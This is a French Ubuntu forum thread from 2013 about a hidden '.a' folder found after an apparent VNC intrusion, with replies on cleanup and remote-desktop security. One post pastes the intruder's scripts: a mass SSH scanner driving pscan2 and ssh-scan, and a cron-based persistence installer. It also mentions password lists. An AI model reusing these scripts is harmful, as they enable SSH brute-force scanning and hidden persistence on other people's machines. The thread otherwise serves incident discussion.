Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#1 Le 25/01/2013, à 21:16

bluc

Dossier ".a" dans le répertoire personnel : c' est un virus !....

0caf8d4de3325b84a31bc6613414at.jpg

Voila Clamtk a confirmé ce que je pensais
En effet un dossier caché étrange nommé .a  dans mon home est apparu après qu'un visiteur indésirable ait pris possession de ma machine

(edit modo : un titre clair ne coûte rien mais apporte beaucoup, merci d'y penser la prochaine fois smile )

modo a écrit :

Dossier ".a" dans le répertoire personnel : est-ce un virus ?

edit bluc : titre modifié je ne me posais pas la question, j'affirme !...c'est un virus

Dernière modification par bluc (Le 26/01/2013, à 13:44)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#2 Le 26/01/2013, à 01:23

mangue

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

La réponse est oui.


ASUS G75VW-T1042V, Toshiba Qosmio et Samsung T-230 LinuxMint 14-15 64bits
Serveur dédié Debian 6.0
Mon BlogNote : http://www.adminreseaux.net
S'il n'y a pas d'accent dans mon message, c'est que je l'ai écris du boulot, désolé.

Hors ligne

#3 Le 26/01/2013, à 06:58

nesthib

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

As-tu déjà supprimé les fichiers ? Si non je serais intéressé pour y jeter un œil (compresse le dossier .a en zip avant de le supprimer, une fois dans le zip il n'y aura plus de risque d'exécution).

Je ne pense pas que l'on puisse qualifier ces fichiers de « virus », je dirais plutôt que c'est une porte dérobée.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#4 Le 26/01/2013, à 08:35

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Oui c'est un Virus linux

Voila le dossier  .a , dans le navigateur

1359059881.png

le sous dossier delles

1359060084.png

le fichier a3

1359060481.png

traduit par Google

echo "Notre Père qui es sur Internet»,
echo "Votre sanctifié rooterele"
echo "Que ta fibre optique"
echo "do-it votre connexion!"
echo "Et donnez-nous la vitesse, nous avons nuit et jour!"
echo "Pardonne-nous des comptes pirates"
echo "comme nous pardonnons à notre facture fournisseurs"
echo "Et ne nous soumets pas à inonder, mais délivre-nous du retard!"
echo "Amen!"


il y a des listes de nom, de mots, d'adresses IP, de nombres comme des mots de passe

du genre

12345
12346
12347
54321

voila quelques fichiers qui sont des scripts.


#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi



echo "*************************RoService TEAM:***************************"
echo "*        Acesta este un scanner privat creat de Muritorul.        *"
echo "*                ____   _____   __     __   __                    *"
echo "*               | ___| | ___ | |  \   /  | |  |                   *"
echo "*               | |    ||   || |   \_/   | |  |                   *"
echo "*               | |__  ||___|| |  |\_/|  | |  |                   *"
echo "*               |____| |_____| |__|   |__| |__|                   *"
echo "*                                                                 *"
echo "*                       --==SCANNER==--                           *"
echo "*                                                                 *"
echo "*****************Greets to all #RoService members******************"
./pscan2 $1 22 

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# Am gasit $oopsnr2 servere"
echo "------------------------"
echo "# Mult Noroc!"
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "Asta e tot.. Vrei sa dai din nou?"

Fichier autorun

#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

update

#!/bin/sh
if test -r /home/taller/.a/ip/m.pid; then
pid=$(cat /home/taller/.a/ip/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/taller/.a/ip
./run &>/dev/null

des fichiers texte du genre

yasuda__ yasuda__!~F2@ADijon-158-1-38-74.w92-130.abo.wanadoo.fr none 1358805930 3 qwp
yasuda_ yasuda_!~F2@host-static-92-115-19-174.moldtelecom.md none 1358805364 2 Ping timeout
yasuda___ yasuda___!~F2@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358805941 3 g00gle
SM SM!~Violeta@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358816234 2 Ping timeout
R0Hack R0Hack!~dyana@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358816202 2 Ping timeout
PirO PirO!~PirO@PirO.users.undernet.org none 1358807448 2 Read error: Operation timed out
Oras Oras!~Violeta@ADijon-158-1-38-74.w92-130.abo.wanadoo.fr none 1358807579 2 Ping timeout
mafiotule mafiotule!~Violeta@18.pool85-58-26.dynamic.orange.es none 1358807580 2 Ping timeout
g00gle g00gle!~F2@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358816234 2 Ping timeout
forget__ forget__!~dyana@ADijon-158-1-38-74.w92-130.abo.wanadoo.fr none 1358806019 3 puty
forget_ forget_!~dyana@host-static-92-115-19-174.moldtelecom.md none 1358805364 2 Ping timeout
forget___ forget___!~dyana@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358806033 3 R0Hack
_cdinamo_ _cdinamo_!~Violeta@host-static-92-115-19-174.moldtelecom.md none 1358805363 2 Ping timeout
___inamo_ ___inamo_!~Violeta@cpc26-chap8-2-0-cust144.18-1.cable.virginmedia.com none 1358805874 3 SM
__dinamo_ __dinamo_!~Violeta@ADijon-158-1-38-74.w92-130.abo.wanadoo.fr none 1358805894 3 Oras

Puis d'autres textes avec des phrases sans aucun rapport les unes avec les autres

Dernière modification par bluc (Le 26/01/2013, à 11:20)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#5 Le 26/01/2013, à 21:22

Vikin712

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Bonsoir.

Un spyware pas un virus. Là le but n'est pas de détruire. En plus un fichier caché dans le Home sans droit admin, exécutable ou pas... wink

#6 Le 26/01/2013, à 23:18

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Fichier trouvé par Clamtk   Linux.RST.B-1


Découvert:
21 décembre 2001
Mise à jour:
21 décembre 2001 22:40:10
Systèmes affectés:
Linux
Linux.RST.B est un virus basé sur Linux. Il est capable d'infecter ELF au format binaire. Lorsqu'il est exécuté, il peut infecter tous les fichiers binaires dans le répertoire de travail courant, et tous les binaires dans le répertoire / bin. Si elle est exécutée en tant que root, il va commencer à écouter les processus sur deux interfaces réseaux qui fournissent un shell root à distance.

Protection antivirus dates
Version initiale des définitions Rapid Release attente
Dernière version des définitions Rapid Release Septembre 28, 2010 révision 054
Version initiale des définitions Daily Certified attente
Dernière version des définitions Daily Certified Septembre 28, 2010 révision 036
Date initiale Weekly Certified attente
Cliquez ici pour une description plus détaillée des définitions Rapid Release et Daily Certified définitions de virus.
Ecrit par: Kaoru Hayashi


Plusieurs fichiers ou il est question de ELF

1359238990.png

Dernière modification par bluc (Le 26/01/2013, à 23:23)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#7 Le 27/01/2013, à 02:55

Vikin712

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Si elle est exécutée en tant que root,

Les 3/4 des nouveaux utilisateurs de Tux ne savent pas qu'il existe des dossiers ou fichiers cachés. Sur ces 3/4 disons que les 3/4 connaissement les fichiers cachés. La dessus en étant sympa 50 % regardent ce genre de fichiers et 50 autres savent le lancer.
Résultat trois ploucs.

Un truc simple pour vérifier les dossiers et fichiers.
Personnaliser  les icônes par défaut. En un coup d'œil tu peux voir ce qui n'est pas normal.
1359251507.jpg
1359251575.jpg

Dernière modification par Vikin712 (Le 27/01/2013, à 02:55)

#8 Le 27/01/2013, à 08:40

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Pas bête ça !...

Je me demande quand même , " Si elle est exécutée en tant que root," je ne vois pas pour quoi quelqu'un irait ouvrir un dossier qu'il ne connait pas
Donc c'est bien de l'exterieur qu'il serait executé , quand je suis revenu sur mon ordi, j'ai eu du mal a en prendre le controle et le terminal était ouvert avec la commande delles donc le le nom du dossier  contenu dans .a

22b98214241035005ffe7ec9ef2c6t.jpg

c'est moi qui ai fermé le processus en terminant la connection et en fermant l'ordi

b6464ab0ea498a09cd4cb4a93ff61t.jpg

Dernière modification par bluc (Le 27/01/2013, à 10:55)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#9 Le 29/01/2013, à 20:20

Vikin712

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

bluc a écrit :

je ne vois pas pour quoi quelqu'un irait ouvrir un dossier qu'il ne connait pas

T'as vu le nombre de nouveaux utilisateurs d'Ubuntu cherchant à installer un soft présent dans les dépôts en utilisant un script trouvé sur un site bancal.
C'est pour cela qu'il est préférable de limiter chaque action super user à une demande de mot  de passe. http://doc.ubuntu-fr.org/sudo?rev=1278760953#options

Actuellement il suffit juste que tu aies tapé un commande en root pour qu'un script en autourun fonctionne si tu cliques dessus.

Pour exemple tu ne connais rien à Tux. Tu me demandes comment lire un DVD ( chose la plus demandée ). Je te donne la commande puis te donne le script te demandant de lancer le script...

#10 Le 29/01/2013, à 22:24

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Ok !...


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#11 Le 30/01/2013, à 00:32

lkhalid

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

génial !
ravi de voir des fichiers malveillant sous ubuntu smile

si c'est possible j'aimerais bien avoir ces fichiers zippé sur un lien téléchargement pour testé mes trois antivirus de test inert depuis deux ans sans une seuls détection.

merçi bien

Hors ligne

#12 Le 30/01/2013, à 00:52

nesthib

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Visiblement, ton attaquant utilise VNC pour prendre le contrôle de ta machine.

Tu peux essayer de bloquer le port de VNC (5900) avec la commande suivante :

sudo iptables -I INPUT --protocol tcp --destination-port 5900 -j REJECT

(ou en allant plus loin : http://blog.oddbit.com/post/blocking-vnc-with-iptables) le temps de sauvegarder tes données.

Honnêtement, tu ne sais pas ce que ton attaquant a pu mettre comme autres portes dérobées. Le plus sage serait… de formater ta partition et de réinstaller proprement.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#13 Le 30/01/2013, à 10:53

Vikin712

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

lkhalid a écrit :

génial !
ravi de voir des fichiers malveillant sous ubuntu smile

C'est pas nouveau. Le seul truc c'est qu'ils ne durent pas longtemps. wink

#14 Le 30/01/2013, à 11:03

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

nesthib a écrit :

Le plus sage serait… de formater ta partition et de réinstaller proprement.

C'est ce que je vais faire,
J’hésite , je ne sais pas si je vais réinstaller la 12.04 ou si j'installe la 12.10

Merci


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#15 Le 30/01/2013, à 13:26

Hoper

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

En tout cas ce virus n'est pas une cause mais une conséquence. Une personne est entré dans ta machine, forcément parce que tu as commis une grosse erreur (activation de la prise de contrôle à distance sans mot de passe ? ou mot de passe trivial ? autre ?) 

A partir de la (prise en main de ta machine avec vnc), je suis quasiment certain que cette personne à voulu s'amuser et à installer lui même ce virus, cet ancêtre devrais-je dire. Sérieusement, un ensemble de scripts shell qui date de 2001 !!!

En tout cas, tu es la premère personne que je vois sur ce forum à t’être effectivement retrouvé avec un "vrai" virus linux. Bravo, ça se fêterai presque smile Le fait que le virus en question soit un vieux bidule qu'une personne aura détéré et installé lui même confirme ce que tout le monde dit : Pour trouver un vrai virus actif de nos jours sous linux, il faut quand même se lever tot smile


Mes tutos et coups de gueule :
http://hoper.dnsalias.net/atdc/
Mastodon: @hoper@framapiaf.org

Hors ligne

#16 Le 30/01/2013, à 13:33

Feeling97

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Waw....
Alors c'est vrai, les virus sous Linux existent yikes
Après faut quand même que la personne ai l'opportunité de l'installer ^^
Ton ordinateur est chez toi? Ou ordi portable pour le boulot? Ou comme l'as dis Hoper tu as fais une erreur en laissant la porte grande ouverte dans le réseau ?


Steam en natif sous Ubuntu
Ordinateur portable Asus K73S avec Ubuntu 12.04.2 LTS en dual boot avec Windows 7 Ultimate Edition et BURG pour le boot.

Hors ligne

#17 Le 30/01/2013, à 17:57

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Hoper a écrit :

En tout cas ce virus n'est pas une cause mais une conséquence. Une personne est entré dans ta machine, forcément parce que tu as commis une grosse erreur (activation de la prise de contrôle à distance sans mot de passe ? ou mot de passe trivial ? autre ?) 

A partir de la (prise en main de ta machine avec vnc), je suis quasiment certain que cette personne à voulu s'amuser et à installer lui même ce virus, cet ancêtre devrais-je dire. Sérieusement, un ensemble de scripts shell qui date de 2001 !!!

En tout cas, tu es la premère personne que je vois sur ce forum à t’être effectivement retrouvé avec un "vrai" virus linux. Bravo, ça se fêterai presque smile Le fait que le virus en question soit un vieux bidule qu'une personne aura détéré et installé lui même confirme ce que tout le monde dit : Pour trouver un vrai virus actif de nos jours sous linux, il faut quand même se lever tot smile


Oui ça se fete un truc comme ça
Le titre de mon topic etait "Ca y est  j'en ai chopé un !...." tout fier de moi
Puis un modo est passé par la changeant mon titre
il avait mis a la place Dossier .a est ce un virus ? que j'ai remodifié en allant un peu dans son sens

Tu dis j'ai commis une erreur
J'ai essayé Reminna et Vinagre en local , je ne suis pas sorti  de mon réseau ,donc pas de porte ouverte
Pas de porte ouverte , pas de porte a fermer

Il n'est pas normal que la porte soit ouverte apres fermeture du logiciel ,encore moins quand on a arreté l'ordi
Quand j'utilise Synaptic ou un autre logiciel comme le terminal, on me demande mon mot de passe ,ce qui est normal, quand je ferme Synaptic je ne peux plus accéder  a celui çi ensuite sans remettre le mot de passe donc pour Vinagre ça devrait etre pareil , voir encore plus sécurisé parce que dans le cas de Synaptic ou d'un autre logiciel  il n'y a que mes proches et moi même qui pourrions faire un bêtise , la c'est n'importe qui et ça c'est une lacune de Ubuntu, ce n'est absolument pas normal
On ne devrait pas pouvoir démarrer son ordi , sans au moins une fenêtre qui nous prévient que nous sommes dans une situation a risque

J'ai été assisté sur Windows au paramétrage d'un logiciel pro avec TeamViewer depuis la Suede une fois TeamViewer fermé, c'est fini

Dernière modification par bluc (Le 30/01/2013, à 19:50)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#18 Le 30/01/2013, à 22:22

richardgilbert

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

D'abord vinagre et remmina sont pour contrôler des bureaux externes, pas le tiens. Regardes Vino ou teamviewer que tu mentionnes, je pense que tu as donné assez vers l'exterieur ou quelqu'un qui a eu accès à ton ordinateur directement.
Change ton mot de passe... pour quelque chose de compliqué.


Debian, Ubuntu, Xubuntu, Lubuntu & Linuxmint.

Hors ligne

#19 Le 30/01/2013, à 23:42

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Peut etre que Remnina et vinagre sont pour contrôler des bureaux externes mais TeamViewer aussi et la c'est un peu plus sécurisé
J'ai utilisé ces logiciels pour essai avec un autre de mes ordis donc je ne suis pas sorti de mon réseau
Une fois que l'on a fermé le logiciel et en plus l'ordi,  il n'est pas normal que ce risque existe sans en être averti
Quand j'utilise SSH pour partager mes fichiers , le lendemain je ne pourrai pas retourner sur mon propre ordinateur distant sans mot de passe...


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#20 Le 31/01/2013, à 13:49

richardgilbert

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Il ne faut pas mélanger:
Teamviewer est un serveur et un client de contrôle à distance.
Remmina et Vinagre sont uniquement des clients de contrôle à distance.

Comme serveur tu as Vino.

Donc ton erreur viens de teamviewer ou de vino, je pense que tu es nouveau dans le monde linux. n'essayes pas de mettre au même niveau deux systèmes qui n'ont rien en commun.


Debian, Ubuntu, Xubuntu, Lubuntu & Linuxmint.

Hors ligne

#21 Le 31/01/2013, à 17:32

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Pour moi les deux servent a faire du contrôle a distance l'un tres bien , l'autre beaucoup moins bien ,
Quand a Vino, oui c'est lui le responsable, c'est lui qui a ouvert une porte vers l'exterieur alors que je n'en avais pas besoin, c'est donc a lui de la refermer

j

e pense que tu es nouveau dans le monde linux.

Oui environ 8 ans, a la difference avec toi c'est que je ne suis qu'un simple utilisateur et linux ,en particulier Ubuntu, est fait aussi pour les gens comme moi ,en fin je crois ou je croyais !...

Dernière modification par bluc (Le 31/01/2013, à 17:38)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne

#22 Le 31/01/2013, à 18:28

tuxmarc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Bonsoir
Ça y est quelqu'un en a vu un !!!
Comme l'a écrit Hoper, on fêterait presque ça lol
Il y a un bout de temps j'avais lancé une discussion pour savoir si quelqu'un avait déjà vu un virus sous Linux.
Réponses unanimes : QUE DALLE !!!!
Je vais zyeuter les répertoires des 14 distris du multiboot ou faire bosser Clamav histoire de vérifier.

Bon, tout est relatif, c'est le premier dont j'entends parler, alors qu'"ailleurs" ça courre les rues roll


Vive Richard Stalmann, Linus Torvalds, et tous les fondus de Linux.
De l'Ordinosaure fait à 90% de récup, à deux portables LDLC,  neufs sans système et une carte mère sans boitier, tous libres !!
Parrain Linux sur www.parrain-linux.com et www.parrains.linux.free.fr

Hors ligne

#23 Le 31/01/2013, à 18:35

Squashfs

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

Salut à tous !

Vous n'avez rien compris au film, il a inventé cette histoire de virus pour faire le buzz lol

Il vous fait marcher depuis le début.

Mais avec moi ça ne marche pas, désolé.

@ bluc : faut arrêter  de prendre les gens pour des cons !

Dernière modification par Squashfs (Le 31/01/2013, à 18:38)

Hors ligne

#24 Le 31/01/2013, à 18:42

nesthib

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

@Squashfs : et il faut surtout respecter les règles du forum. On ne se moque pas d'une question et on respecte le niveau de chacun. Considère ceci comme un avertissement.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#25 Le 31/01/2013, à 20:16

bluc

Re : Dossier ".a" dans le répertoire personnel : c' est un virus !....

je n'ai pas posé de question, j'ai signalé avoir eu un virus sur Linux .
virus qui est connu de longue date, qui ne peut peut être faire aucun dégâts, (on en aurait déja entendu parler)  je n'en sais rien , je n'ai pas la science infuse de Squashfs   wink

J'ai mis ce dossier dans une archive si Squashfs le veux , je peux lui faire parvenir il lui suffira de le décompresser et de s'amuser a  exécuter les scripts qui s'y trouvent, c'est peu être rigolo qui sait  wink
Ou alors il nous répondra depuis Windows

Dernière modification par bluc (Le 31/01/2013, à 21:40)


Clevo :  Ubuntu 23.10   ❖  Xubuntu 22.10  ❖  Kubuntu 23.10   
         avec partition data commune       Une fraction de seconde                    Multiboot

Hors ligne